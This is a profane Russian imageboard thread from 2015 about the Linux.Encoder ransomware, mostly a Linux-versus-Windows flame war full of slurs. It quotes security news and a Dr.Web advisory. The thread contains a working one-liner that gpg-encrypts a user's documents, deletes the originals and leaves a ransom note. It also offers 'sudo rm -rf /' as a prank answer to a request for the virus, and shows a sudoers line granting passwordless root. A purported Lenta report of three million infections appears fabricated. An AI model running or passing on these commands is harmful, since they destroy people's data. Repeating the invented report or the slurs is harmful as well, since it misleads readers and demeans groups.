Так я и говорю: сразу ясно, что нахуй миллионные базы никому не нужны. И ПД никому не нужны, таргетированных спам-рассылок и обзвонов давно не существует. И из клиентской базы какого-нибудь эшлимэдисон ни копейки не вытянуть, не говоря уже о разных нищих МММ-щиках и хайперах.
Куда лучше с васяновских пентиумов копейки доить, ты абсолютно прав.
Нехило гумло на три поста взорвалось.
Так и будет. Ещё одна удивительная история системд.
Уязвимость в вымогательском ПО для Linux/FreeBSD свела стойкость шифрования на нет
http://www.opennet.ru/opennews/art.shtml?num=43299
У ПЕРДОЛИКОВ даже ПЕРДОЛОКЕР с уязвимостью. Пиздец ПЕРДОРЕШЕТО на ПЕРДОРЕШЕТЕ.
http://www.opennet.ru/opennews/art.shtml?num=43299
У ПЕРДОЛИКОВ даже ПЕРДОЛОКЕР с уязвимостью. Пиздец ПЕРДОРЕШЕТО на ПЕРДОРЕШЕТЕ.
Двачую. То ли дело на сперме - настоящие профессиональные вирусы, никакому касперскому и доктору вебу не под силу победить их. Это ситуация как с ГИМПом и фотошопом.
БГГГГГГГГГГГГГГГГГГГГГГГГГГГГГГГГ
Разница между комьюнити СПЕРМОКЛОВАНОВ и линукс-профессионалов налицо. Первые СОСУТ ПРОПРИЕТАРНЫЙ ХУЙ СПЕРМОГОСПОДИНА, вторые берут исходники и всё чинят.
> После запуска с правами администратора
Опасный, сука.
Последний раз когда сам в исходники лез?
Эпичный отсос прыщеблядей.
Вчера.
>Исследователи лаборатории Bitdefender проанализировали недавно анонсированное вымогательское вредоносное ПО Linux.Encoder.1, осуществляющее шифрование данных на серверах с Linux и FreeBSD, и нашли в нём серьёзный промах в организации процесса шифрования, позволяющий расшифровать данные без получения приватного ключа RSA. Результаты анализа послужили основой для написания Python-скрипта, автоматизирующего расшифровку и восстановление данных.
Чото в голос.
>Кроме того, стали известны подробности поражения серверов вредоносным шифровальщиком. Linux.Encoder.1 проникал в систему эксплуатируя уязвимость в платформе электронной коммерции Magento, позволяющую атакующему выполнить произвольный PHP-код на сервере.
>платформе электронной коммерции Magento
Представляю ахуевшие ёбла манагеров.
УНАСВСЬОПОЛОМАЛОСЬ!!!!!
Двачую.
>Я бы ради такого с радостью достал бы виртуалку и запустил бы под ней его,
Ну дык. Дохтур еб, между тем, на запрос не звонят и не пишут.
Пришлось самому писать ВИРОС, в параллельном треде уже постил:
[CODE] gpg --recv-key 0x31337 && find / -regextype posix-egrep -iregex '.*?(pdf|png|doc|xlsx|jpg|govno|mocha|allah)$' -exec gpg -e --recipient 0x31337 {} \; -delete && echo "UR FUCKED\!\!\!111\n SEND ME YOR MONEY" >$HOME/READ_ME_U_FUGGEN_FAGGOT.TXT
[/CODE]
Поссал за воротник тупорылой спермобляди.
Ну и толку шифовальщику от выполнения пхп кода на сервере? Все равно у нормальных админов для перезаписи важных файлов, будь то код сайта, или база данных, или бекап или что угодно, нужны права рута. С правами вебсервера много не нашифруешь.
> [CODE]
`ну кавычки жи блят`
>пердорешето
А теперь сравни количество вирусов под "решето" с количеством вирусов под "нерешето", бгггг
Хуево. Потому, что эти кавычки могут использоваться в коде.
Да они тоже не работают, макака всё поломала.
Безопасность уровня неуловимого Джо, линукс никому нахуй не нужен, никто не будет для 2% писать
PHP ALL=(ALL:ALL) NOPASSWD:ALL
>линукс никому нахуй не нужен
То-то на нем практически весь инторнет крутится.
Бляяяяяя, вот это лол.
У меня друг работает тестировщиком а мадженто.
Сегодня вечером спрошу у него и в тред отпишусь.
У меня друг работает тестировщиком а мадженто.
Сегодня вечером спрошу у него и в тред отпишусь.
Вирусы пишут преимущественно для десктопов, а не для запускалок апача или прошивок для роутеров.
Именно поэтому под десктоп для геев их тоже нет?
Там есть два с половиной, но тоже надо запускать от рута, потому что юникс.
Ну прям сказал, как в лужу пернул.
Ну т.е. абсолютно так же как и на linux.
Не совсем. Если линуксоиды умеют в терминал, то пидоры практически нет.
Дык я про вирусы, остальное то давно известные истины
То-то китайцы облюбовали роутеры со стандартными паролями для создания ботнетов.
Это ж сколько роутеров надо для ботнета, чтобы по производительности он равнялся одному пека?
Они же не одними роутерами атакуют, это просто ещё одна уязвимая группа устройств, с которой можно поиметь профит.
Халявный вайфай!
Именно поэтому sudoers должен быть нередактируем для всех, кроме root.
ROOT ОТРЕДАКТИРУЕТ
@
ДЕД ДОЕСТ
Про флэшбэк уже забыли все?
Бамп!
тст
бггг
132
>м (Apple Mac: Microsoft Edge)
Но зачем
прост вот еще и юа пидорахен бровзера найду будет вообще збс
бмпо
Блеадь, на генте дерево портажей слетело, пришлось к 11 числу откатывать.
Назначение разное.
дурачок чтоле?
https://news.drweb.ru/show/?i=9699 - первые подробности пошли
www.lehmann-kg.com/modules/README_FOR_DECRYPT.txt.encrypted
Ай лолд, кого-то два раза подряд накрыло
Ай лолд, кого-то два раза подряд накрыло
>НУ КУПИИИТЕ
Проиграл с комментариев. Как будто боты пишут. Ох, вейт...
>сами ничо не делайте, а присылайте нам
>мы тут покумекаем канешн, но не факт
>но вы все равно купите!
>какой-такой decrypter.py? а вот еще один вирус подцепите!
>мы тут покумекаем канешн, но не факт
>но вы все равно купите!
>какой-такой decrypter.py? а вот еще один вирус подцепите!
> Как будто боты пишут.
Ты не поверишь...
А где вирус скачать дайте ссыль, протестирую на работе на удаленном серваке. Хоть поржем с пацанами-админами
Самое простое походу - выставить дырявый цмс жопой наружу и ждать, пока он сам найдется.
ловля на живца
> дырявый цмс жопой наружу
ммм... я б поняшил
> Получив несанкционированный доступ к сайту, киберпреступники размещали на нем файл error.php
Бля, пиздец он опасный, сука.
У кого есть свободная виртуалка/VPS/VDS?
Накати локально в виртуалку. VMware Workstation, например.
Просто накатить мало, его же ещё поймать надо, а то он пролезет в систему, зашифрует там всё и самоуничтожится.
Бамп пердоболи.
Ну так пердолики всегда отсасывали первыми, а годных вещей не видели. Скоро будут в консолечку пердолиться и удалять смс-трояны.
Ну что, ссылку дадите?
sudo rm -rf /
В голосину.
Не туда
И в самом верху.
А как вообще можно подхватить болячку на линуксах? Там же все проги через репозитории или исходники ставятся? Всякое кинцо, игры, программы качаю уже 3 года с трекеров, без антивируса, и ничего не подхватил даже на винде
Очень просто. Васян закидывает говнецо в репозиторий, пердолики это говнецо с успехом устанавливают.
Говнецо же никто не будет проверять, ибо все веруют в безопашность жму/пинуса.
> Васян закидывает говнецо в Windows Update, спермачи это говнецо с успехом устанавливают.
Как-будто адепт дриснятки поймет твою иронию.
Реверс пердопорватки не относится к иронии.
Сколько ни видел рабочих компов под WinXP, так все годами без проблем работают. И доступ в интернет есть. Только там прав пользователям никто не даёт.
Кекаю со срача
> срача
как-будто что-то плохое...
Арргх! Поднять тред!
А вот и ожидаемое продолжение пердоотсоса.
00:04, 17 ноября 2015 Lenta
Больше не безопасно
Эпидемия вируса "Linux.Encoder", совсем недавно обнаруженного компанией "Dr.Web", стремительно набирает обороты. Проникая в систему с правами обычного пользователя, вредоносная программа зашифровывает файлы в директориях уникальным и крайне стойким энкриптором, после чего владельцу компьютера придётся либо распрощаться со своими данными, либо перевести определённую сумму злоумышленнику за получение "ключа" декриптора. На специальном сайте, созданном автором вируса для демонстрации "успехов" его зловредного детища, уже более трёх миллионов записей от заражённых машин, и количество растёт лавинообразно (для сравнения, ещё неделю назад было опубликовано лишь около 200 компьютеров, успешно подвергнувшихся атаке). Таким образом, уверенность в том, что Linux-системы не подвержены влияниям вирусов, основательно пошатнулось.
00:04, 17 ноября 2015 Lenta
Больше не безопасно
Эпидемия вируса "Linux.Encoder", совсем недавно обнаруженного компанией "Dr.Web", стремительно набирает обороты. Проникая в систему с правами обычного пользователя, вредоносная программа зашифровывает файлы в директориях уникальным и крайне стойким энкриптором, после чего владельцу компьютера придётся либо распрощаться со своими данными, либо перевести определённую сумму злоумышленнику за получение "ключа" декриптора. На специальном сайте, созданном автором вируса для демонстрации "успехов" его зловредного детища, уже более трёх миллионов записей от заражённых машин, и количество растёт лавинообразно (для сравнения, ещё неделю назад было опубликовано лишь около 200 компьютеров, успешно подвергнувшихся атаке). Таким образом, уверенность в том, что Linux-системы не подвержены влияниям вирусов, основательно пошатнулось.
Сам придумал?
> уникальным и крайне стойким энкриптором
Вот тут перетолстил.
Как будто вирусу на шиндовез не нужны права администратора.
ПЕРДООТРИЦАНИЯ
Удалили статью уже, видимо, автор проплатил редакции.
>Microsoft Windows
>ПЕРДООТРИЦАНИЯ
Пердолик признал, что он пердолик, лол.
> пердоля маняврирует
Лойс ))
На живца предлагали же ловить вирус, кто-нибудь пришёл к успеху?
Судя по отсутствию активности прыщепердолей в треде — все они ушли покупать биточки для оплаты дешифратора, бггг
В голосину. Найс, найс.
Эпичный обосрамс пердаунов
Ты перепутал прыщи с ведроидом.
2-я версия вируса вышла. https://news.drweb.ru/show/?i=9709&c=5&lng=ru&p=0
«Доктор Веб»: обнаружен Linux.Encoder.2
Появление опасного шифровальщика для ОС Linux, получившего наименование Linux.Encoder.1, всколыхнуло мировую общественность — оказалось, что это семейство операционных систем, всегда считавшееся устойчивым к воздействию вредоносных программ, также подвержено риску заражения энкодерами. Тем не менее, данный троянец оказался не единственным — в последнее время стало известно как минимум еще о двух представителях этой группы шифровальщиков. Специалисты компании «Доктор Веб» готовы поделиться результатами исследования одного из них, получившего наименование Linux.Encoder.2.
Несмотря на то, что данная вредоносная программа была добавлена в вирусные базы Dr.Web под вторым номером, исторически она появилась раньше, однако в течение длительного времени не попадала в поле зрения аналитиков антивирусных компаний. Более того: недавно одна из компаний – разработчиков антивирусного ПО опубликовала исследование другого троянца, названного ею Linux.Encoder.0, — предположительно, он является самым первым в этой группе шифровальщиков, Linux.Encoder.2 начал распространяться чуть позже, в сентябре-октябре 2015 года, а уже затем появился Linux.Encoder.1.
Среди основных отличий этой модификации шифровальщика от Linux.Encoder.1 необходимо отметить то, что она использует другой генератор псевдослучайных чисел, для шифрования применяет библиотеку OpenSSL (а не PolarSSL, как в Linux.Encoder.1), шифрование осуществляет в режиме AES-OFB-128, при этом происходит повторная инициализация контекста каждые 128 байт, то есть через 8 блоков AES. Также в Linux.Encoder.2 имеется ряд других существенных отличий от альтернативной реализации этого энкодера.
Следует также отметить, что все известные на сегодняшний день утилиты, предназначенные для расшифровки файлов, не удаляют внедренный злоумышленниками на инфицированный сервер шелл-скрипт, которым впоследствии могут воспользоваться киберпреступники для повторного заражения системы. Поэтому специалисты службы технической поддержки компании «Доктор Веб» помогают всем обратившимся за помощью в расшифровке файлов пользователям очистить систему от посторонних вредоносных объектов и обезопасить ее от возможных атак с использованием этого скрипта в будущем.
Сигнатура Linux.Encoder.2 добавлена в вирусные базы Антивируса Dr.Web для Linux. Специалисты компании «Доктор Веб» разработали методику расшифровки файлов, поврежденных в результате действия этой вредоносной программы. Если ваши файлы стали недоступны в результате проникновения Linux.Encoder.2, выполните следующие действия:
обратитесь с соответствующим заявлением в полицию;
ни в коем случае не пытайтесь каким-либо образом изменить содержимое папок с зашифрованными файлами;
не удаляйте никакие файлы на сервере;
не пытайтесь восстановить зашифрованные файлы самостоятельно;
обратитесь в службу технической поддержки компании «Доктор Веб» (эта услуга бесплатна для пользователей коммерческих лицензий Dr.Web);
к тикету приложите любой зашифрованный троянцем файл;
дождитесь ответа специалиста службы технической поддержки; в связи с большим количеством запросов это может занять некоторое время.
Напоминаем, что услуги по расшифровке файлов оказываются только обладателям коммерческих лицензий на антивирусные продукты Dr.Web. Компания «Доктор Веб» не дает полной гарантии расшифровки всех поврежденных в результате действия энкодера файлов, однако наши специалисты приложат все усилия, чтобы спасти зашифрованную информацию.
Подробнее о троянце https://vms.drweb.ru/virus/?i=7734389
«Доктор Веб»: обнаружен Linux.Encoder.2
Появление опасного шифровальщика для ОС Linux, получившего наименование Linux.Encoder.1, всколыхнуло мировую общественность — оказалось, что это семейство операционных систем, всегда считавшееся устойчивым к воздействию вредоносных программ, также подвержено риску заражения энкодерами. Тем не менее, данный троянец оказался не единственным — в последнее время стало известно как минимум еще о двух представителях этой группы шифровальщиков. Специалисты компании «Доктор Веб» готовы поделиться результатами исследования одного из них, получившего наименование Linux.Encoder.2.
Несмотря на то, что данная вредоносная программа была добавлена в вирусные базы Dr.Web под вторым номером, исторически она появилась раньше, однако в течение длительного времени не попадала в поле зрения аналитиков антивирусных компаний. Более того: недавно одна из компаний – разработчиков антивирусного ПО опубликовала исследование другого троянца, названного ею Linux.Encoder.0, — предположительно, он является самым первым в этой группе шифровальщиков, Linux.Encoder.2 начал распространяться чуть позже, в сентябре-октябре 2015 года, а уже затем появился Linux.Encoder.1.
Среди основных отличий этой модификации шифровальщика от Linux.Encoder.1 необходимо отметить то, что она использует другой генератор псевдослучайных чисел, для шифрования применяет библиотеку OpenSSL (а не PolarSSL, как в Linux.Encoder.1), шифрование осуществляет в режиме AES-OFB-128, при этом происходит повторная инициализация контекста каждые 128 байт, то есть через 8 блоков AES. Также в Linux.Encoder.2 имеется ряд других существенных отличий от альтернативной реализации этого энкодера.
Следует также отметить, что все известные на сегодняшний день утилиты, предназначенные для расшифровки файлов, не удаляют внедренный злоумышленниками на инфицированный сервер шелл-скрипт, которым впоследствии могут воспользоваться киберпреступники для повторного заражения системы. Поэтому специалисты службы технической поддержки компании «Доктор Веб» помогают всем обратившимся за помощью в расшифровке файлов пользователям очистить систему от посторонних вредоносных объектов и обезопасить ее от возможных атак с использованием этого скрипта в будущем.
Сигнатура Linux.Encoder.2 добавлена в вирусные базы Антивируса Dr.Web для Linux. Специалисты компании «Доктор Веб» разработали методику расшифровки файлов, поврежденных в результате действия этой вредоносной программы. Если ваши файлы стали недоступны в результате проникновения Linux.Encoder.2, выполните следующие действия:
обратитесь с соответствующим заявлением в полицию;
ни в коем случае не пытайтесь каким-либо образом изменить содержимое папок с зашифрованными файлами;
не удаляйте никакие файлы на сервере;
не пытайтесь восстановить зашифрованные файлы самостоятельно;
обратитесь в службу технической поддержки компании «Доктор Веб» (эта услуга бесплатна для пользователей коммерческих лицензий Dr.Web);
к тикету приложите любой зашифрованный троянцем файл;
дождитесь ответа специалиста службы технической поддержки; в связи с большим количеством запросов это может занять некоторое время.
Напоминаем, что услуги по расшифровке файлов оказываются только обладателям коммерческих лицензий на антивирусные продукты Dr.Web. Компания «Доктор Веб» не дает полной гарантии расшифровки всех поврежденных в результате действия энкодера файлов, однако наши специалисты приложат все усилия, чтобы спасти зашифрованную информацию.
Подробнее о троянце https://vms.drweb.ru/virus/?i=7734389
Предсмертная агония производителей антивирусов видна невооружённым глазом. Уже просто не знают, как бы хоть сотую часть процента от рынка завоевать — придумали СТРАШНЫЕ ВИРОВСЫ ПОД ЛИНАКС, да ещё и целых ДВЕ ШТУКИ! Срочно всем покупать лицензии.
Вот только перед закидыванием в реп, мейнтейнеры досконально проверяют любое говнецо
> "Ваш Windows заблокирован"
> У тебя Linux
> У тебя Linux
Пердобараны все еще верят, что для их куска говна нет вирусов, хехе.
определение вируса скозал, спермохохол
Пердоманёвры. Иди купи биточков, пригодятся для покупки декриптора. Или щас будет сверхатомное ВРЕЕЕЕЕЕЕТИИИИИИИ?
О, круто. В каких репах есть?)))
Дай хотя бы 10, и так чтобы они сами комп под линуксом заражали, а не нужно было их вручную запускать под рутом.
Трел жопой читал?
Я его вообще не читал, но твой пост, уёбок, попался на глаза на нулевой. А что?
Ну так почитай, пердоимбецил.
Почитает, узнает как страшный ВИРОС всем тредом запускать пытались.
Ну вот я мимо проходил и прочел этот, с позволения сказать, тред.
Итог:
Кроме «Dr Web» и нескольких малолетних дебилов из /s никто ни о каком «вирусе» не знает и никто его не видел. Мало того — никому не известно ни одного случая заражения этим загадочным вирусом. Ну, может быть, кроме также никому не известных сотрудников «Dr Web». Наверное это какие-то секретные сотрудники...
Как подключить его репозитории?
> неизвестных
самопочин
Специально для пердоклоунов в треде дан линк на сотни тысяч зараженных машин, но консоль в срачле негативно влияет на зрение, как известно.
> в треде дан линк на сотни тысяч зараженных машин
Где ?
Первый линк по теме — «По запросу Эпидемия вируса Linux.Encoder site:lenta.ru ничего не найдено. »
Вы уж постарайтесь линки пореальнее давать. А то сами себя только клованами выставляете.
В первый раз спермачи проигнорировали мой вопрос. Спрашиваю второй раз: в каких репах есть эта прога?
>дан линк на сотни тысяч зараженных машин
>Результатов: примерно 3 100
Ясно.
Ага, и какие зависимости для компиляции...
libopenssl, libtls какие-нибудь
> для 2%
уже для 2?
пиздец, линуксы становятся мейнстримом, пора перекатываться в какую-нибудь хайку
Перекатился на твою мамку ))
Э, ты че, охуел?
Бамп именем пердобезопасности!
На пердоубнту может только какой-нить ебнутый пердохохол сидеть. Настоящий православный человек ни за что не сядет на пердоубунту.
Тем временем, количество зараженных пердосистем вплотную приблизилось к миллиону. Это где-то 50% от всех их инсталляций, да? Пердонадежность.
>количество зараженных пердосистем вплотную приблизилось к миллиарду
Пофиксил.
>все пердосистемы в галактике заражены. Галактический пердоальянс в растерянности.
Пердоля, зачем ты сам с собой разговариваешь?
>>1485898
Расшифровался с этого пердобезопасника.
Расшифровался с этого пердобезопасника.
Бамп зондопараше с вирусами.
Столлман уже сказал своё слово насчёт этой эпидемии?
Касперский подтвердил эпидемию.
>зондопараше
>Google Android
Новости пердомирка есть, не?
>>Ubuntu
>пердофайлы
Выродков, не сумевших настроить Debian и пользующихся анальными костылями Шаттл-в-рота не жалко.
Тред не читал
Ведроид это касается? То есть порно на телефоне смотреть больше нельзя?
Ведроид это касается? То есть порно на телефоне смотреть больше нельзя?
На ведроиде, как и на любой пердосистеме, вирусов и до этого была ёбаная тьма. Так что одним больше...
>ёбаная тьма
вот где они все? или ты про плей маркет и софт от гугла? что такое вирус на андроид? как он установится, если стоит по дефолту запрет на установку не из маркета
Соснули все. http://geektimes.ru/company/ua-hosting/blog/262704/
Этот свынобул-спермач из хрюкраины ещё копротивляется?
Зато в виндовс-сторе такая ситуация невозможна
Во-первых, в маркет часто всякая хуйня пролезает, пока удалят, уже может успеть понахуячить. Во-вторых, куча людей рутует ведрофоны и ставит всякое левое говно из апк. В-третьих, там даже в прошивках бывает мякотка.
t. владелец андроида с чистым цианом без гуглоговна
Ещё бы, софта-то и вовсе нет, вирусам не подо что маскироваться.
Все там есть, пердораб. Без вирусни и отменного качества. Прямая противоположность сральному ведру.
Ну что без отменного качества-то я видел, но это же неуловимый Джо как он есть, как для девелоперов софта, так и виросов. Не нужно же никому, вон скоро нокия начнёт вёдра выпускать опять и всё, утонет плиткофон навсегда даже со своей йоба-камерой.
>утонет плиткофон
Ога, уже утонул. Так же как и вендекапец настал.
Пердомечты такие пердомечты.
> но это же неуловимый Джо как он есть, как для девелоперов софта, так и виросов.
Поразительно точное описание прыщесистем.
А теперь приведи такойже список для спермы
Microsoft
Привел
...и за даже за этими "громкими" именами мы видим пикрелейтед.
Прикольно, что народ уже просто игнорит предложения обновиться, даже забесплатно. И только 2% эксцентричных упорков ставят десятку.
> Ширпотреб
Тут никто в этом и не сомневался.
> А теперь приведи такойже список для спермы
Его просто нет, такого же для спермы. Но гугл в первых строчках выдает
http://www.bluerooster.com/about — этого партнера Microsoft
>пикрелейтед
Задорнов прослезился.
Расширение модулей ядра имеет формат .со (ко)
Пользуясь случаем, передаю привест всем, кто осилил тред до конца.
Есть два стула
Питух ОС 7 и и Питух ОС 10?
>Питух ОС 7
>Питух ОС 10
А то!
Пердоля, ты свой реверс аргументировать хоть можешь?
> fedora 10
> 2015
Ебать, уот это реверс. Ты уже определись, пердораб, мало вас там или много.
Пердоля загорелась и забавно зашуршала боевыми картиночками. Годы идут, а прыщерабы не меняются (впрочем, как и их пердосистемы, застрявшие в 80-х годах прошлого века).
>>149489
зачем ты так издеваешься над пердосектантом, его же удар хватит
зачем ты так издеваешься над пердосектантом, его же удар хватит
В голос с пикчи
>застрявшие в 80-х годах прошлого века).
ВОТ ТО ЛИ ДЕЛО БАЖЕСТВЕННАЯ ДРИСЯТОЧКА
>БА-БАХ!
Лойс )
ахахахаха ну ты Пердоля ну насмещил браво пиши есчо!!!
>ахахахаха ну ты Пердолю ну насмещил браво пиши есчо!!!
фиксанул тебя, Пердоля
> обнаружен Linux.Encoder.2
> до этого был Linux.Encoder.1
> с самого начала подразумевалась нумерация
> Dr.Web первый заявляет о какой-то эпидемии
Кокой жырный вброс от доктора. Очевидно, блядь, откуда эти вирусы берутся.
Вангую сервера с незакрытыми эксплойтами типа хартблида, на которые менеджеры компании заливали самописные скрипты шифрования.
>под управлением ОС Linux
Not this shit again.
Его ведь руками, из под рута запустить надо, да? Всё, пиздец, сношу на серваке центос, бегу-несу деньги майкрософту.
Пердоотсос продолжается.
К слову, на примере срального ведра под название "андроид" очень отчётливо видно, какой дырявой парашей являются прыщеподелия, как только пытаются пройти проверку какой-никакой популярностью.
> на примере хуй86-помойки под название "питухОС шиндоус" очень отчётливо видно, какой дырявой парашей являются спермоподелия, как только завладевают всемирной популярностью.
Ничего не напоминает? Что популярно, в том и дыры ищут.
Спермодебил, ПитухОС пока непопулярна, всего два процента. Так что дыры никто искать не будет.
Лучше следи за своими зондами в срачле.
Пердоля, не лезь в разговор серьёзных людей со своими тремя процентами.
>прыщеподелия
Лил, пердоля пытается назвать андроид прыщами, вот так манёвр.
Пердоля, ты отрицаешь, что ведроил является прыщами? Эталонный пердомирок.
>С Пауком такой уже не страшен!
Не работай под рутом.
Тоже мощнейше проиграл с комментариев. Копирайтеры незаметны.
У ведроида от прыщей только ведро.
И ТО ДЫРЯВОЕ
Классно, за вам Господин решает, под кем работать. Эталонное стадо.
АХАХА ПЕРДОЛИ ОБОССАНЫ
Я ПЕРЕСОЗДАМ ЗА ОПА ПОТОМ АХАХАХ
Бамп пердовирусам.
После запуска Linux.Encoder на сервере жертвы производится шифрование файлов, доступных в рамках текущих привилегий доступа. В том числе шифруется содержимое директорий с компонентами web-сайтов, git- и svn-nрепозитории, директории с данными MySQL, файлы конфигурации nginx и apache httpd, содержимое домашней директории, бэкапы и файлы с такими расширениями, как ".php", ".html", ".tar", ".gz", ".sql" и ".js". Зашифрованные файлы снабжаются расширением .encrypted. Условия расшифровки размещаются в файле README_FOR_DECRYPT.txt, который копируется в каждую директорию с зашифрованными данными. Ключ для расшифровки предлагается получить на сайте, работающем в форме скрытого сервиса Tor.
Ну что, пердоляторы, где ваша хвалёная пердобезопасность? Ах, да, ее никогда и не было.